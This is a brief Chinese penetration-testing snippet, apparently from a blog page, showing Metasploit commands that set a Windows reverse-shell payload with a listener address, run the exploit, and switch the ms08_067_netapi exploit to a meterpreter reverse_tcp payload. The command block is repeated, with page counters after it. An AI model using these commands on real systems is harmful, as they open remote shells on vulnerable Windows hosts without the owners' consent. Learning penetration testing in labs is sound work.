set payload windows/shell_reverse_tcp //反向连接
set LHOST 192.168.200.148
show options
exploit
meterpreter是一个很强大的工具。
可以payload设置为meterpreter
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
本文介绍使用Metasploit框架进行渗透测试的过程,包括设置payload为windows/shell_reverse_tcp实现反向连接,以及如何利用meterpreter工具进行更高级的操作。还展示了如何针对特定漏洞(ms08_067_netapi)配置payload。
set payload windows/shell_reverse_tcp //反向连接
set LHOST 192.168.200.148
show options
exploit
meterpreter是一个很强大的工具。
可以payload设置为meterpreter
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
518
7515

被折叠的 条评论
为什么被折叠?